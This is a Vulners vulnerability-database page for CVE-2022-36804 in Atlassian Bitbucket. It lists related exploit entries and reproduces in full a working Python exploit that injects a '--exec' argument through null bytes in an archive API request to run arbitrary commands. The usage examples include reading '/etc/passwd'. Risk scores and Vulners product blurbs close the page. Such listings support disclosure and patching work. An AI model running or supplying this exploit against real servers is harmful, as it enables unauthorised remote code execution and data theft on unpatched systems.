Vulners
Lucene search
Bitbucket v7.0.0 - RCE
| Reporter | Title | Published | Views | Family All 54 |
|---|---|---|---|---|
 | Exploit for Argument Injection in Atlassian Bitbucket | 24 Sep 202205:04 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 26 Feb 202620:42 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 20 Sep 202202:35 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 20 Sep 202201:30 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 20 Sep 202202:35 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 23 Jan 202312:51 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 23 Sep 202211:05 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 25 Sep 202213:16 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 30 Jan 202515:52 | – | githubexploit |
| Exploit for Argument Injection in Atlassian Bitbucket | 19 Sep 202213:15 | – | githubexploit |
10
# Exploit Title: Bitbucket v7.0.0 - RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804
#****************************************************************#
#The following exploit is used to exploit a vulnerability present
#Atlassian Bitbucket Server and Data Center 7.0.0 before version
#7.6.17, from version 7.7.0 before version 7.17.10, from version
#7.18.0 before version 7.21.4, from version 8.0.0 before version
#8.0.3, from version 8.1.0 before version 8.1.3, and from version
#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1
#Usage Example
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'
#The server will send a 500 http response with the stout output from the
# command executed.
#****************************************************************#
#!/usr/bin/python3
import argparse
import urllib
from urllib import request
import re
#argument setup
parser = argparse.ArgumentParser(description='Program to test
bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack.
[REQUIRED]", required=True )
parser.add_argument("--cmd", help="Set the command to execute.
[DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd= urllib.parse.quote(args.cmd)
#reads from the public repository what is available
requ = request.urlopen(args.url+ "/repos?visibility=public")
response = requ.read()
#select a public project and stores it in a variable
project = re.findall('7990/projects/(.*)/repos/',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]
#Selects a public repo and stores it in a vatiable
file = re.findall('/repos/(.*)/browse',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]
# Exploitation
try :
attack = request.urlopen(args.url +
"/rest/api/latest/projects/" + project + "/repos/" + file +
"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
print (attack.response())
except urllib.error.HTTPError as e:
body = e.read().decode() # Read the body of the error response
print (body)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2023 00:00Current
9High risk
Vulners AI Score9
CVSS 3.18.8
EPSS0.944
SSVC